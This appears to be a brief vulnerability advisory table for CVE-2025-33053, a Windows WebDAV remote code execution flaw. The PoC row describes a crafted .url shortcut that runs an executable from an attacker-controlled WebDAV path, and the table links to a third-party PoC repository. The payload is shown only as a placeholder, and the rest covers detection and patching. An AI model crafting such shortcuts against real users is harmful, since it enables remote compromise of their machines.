CVE-2025-33053 | WEBDAV | RCE
| Vulnerability | CVE-2025-33053 |
|---|---|
| Type | Remote Code Execution Vulnerability for WEBDAV service |
| Description | CVE-2025-33053 is a vulnerability within the WebDAV service that allows attackers to execute arbitrary code remotely through the manipulation of the working directory. |
| The Impact of the Bug | The primary impact of CVE-2025-33053 is Remote code execution once the user opens a manimulated .url file that can simply lunchs any legitimate executable but with the threat actor working directory which could be a remote WebDAV URL. |
| Explotation PoC | The following is an example of a .url file to exploit this vulnarability[InternetShortcut] Once the user opens the shortcut file, it will automatically execute the file \\[Attacker WEBDAV path]\route.exe instead of the local legitimate route.exe under \windows\system32\ |
| How to detect if you are vulnerable to this attack vector? | 1. Identify Windows Version: - Verify that you have the patched Windows version released on Jun 10, 2025 (affected versions include Windows 10/11 and Windows Server 2008,2012,2016,2022,2025). 2. Check for Patch Installation: - Use the Microsoft Security Update Guide for CVE-2025-33053 to confirm if the system has the relevant security updates installed. 3. Test for Vulnerability: - Use available Proof-of-Concept (PoC) tools from the following repositories: - https://github.com/havij13/CVE-2025-33053-WebDAV-0-Day-RCE |
| References | - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-33053 - https://nvd.nist.gov/vuln/detail/CVE-2025-33053 - https://research.checkpoint.com/2025/stealth-falcon-zero-day/ |